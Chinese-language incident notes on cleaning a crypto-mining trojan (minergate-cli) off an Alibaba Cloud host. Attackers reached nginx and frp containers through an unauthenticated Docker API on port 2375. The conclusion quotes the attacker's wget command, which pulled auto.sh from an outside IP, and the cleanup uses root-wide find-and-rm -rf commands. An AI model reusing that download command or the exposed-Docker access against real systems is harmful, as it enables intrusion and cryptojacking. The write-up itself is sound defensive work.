阿里云问题分析

阿里云问题分析

1、破解方法连接

https://www.cnblogs.com/hanyifeng/p/5526799.html

 

2、阿里云云盾告警

 

 

3、top命令验证挖矿木马进程

 

4、ps 查看木马进程

[root@backup ~]# ps aux | grep minergate-cli

 

 

5、find查找挖矿木马执行脚本

 

6、删除所有木马文件

[root@backup ~]# find /* -name minergate-cli | xargs -i rm -rf {}

 

7、查看所有木马脚本

 

发现在docker宿主机数据目录存在木马脚本

 

8、查看运行容器

 

 

9、连接nginx 容器，发现挖矿木马脚本

 

 

10、连接frp 容器，发现挖矿木马脚本

 

 

11、删除木马脚本

[root@backup ~]# find /* -name auto.sh | xargs -i rm -rf {}

 

 

配置文件修改

去掉-H tcp://192.168.100.143:2375

 

 

systemctl daemon-reload

systemctl restart docker

 

 

结论：外部通过docker 2375连接到nginx容器和frp容器内，执行了wget http://58.218.56.91:8082/auto.sh -O auto.sh，在容器内生成了minergate-cli木马执行文件。宿主机未发现被侵入情况，阿里云安全组和线上相关docker 2375问题处理完成。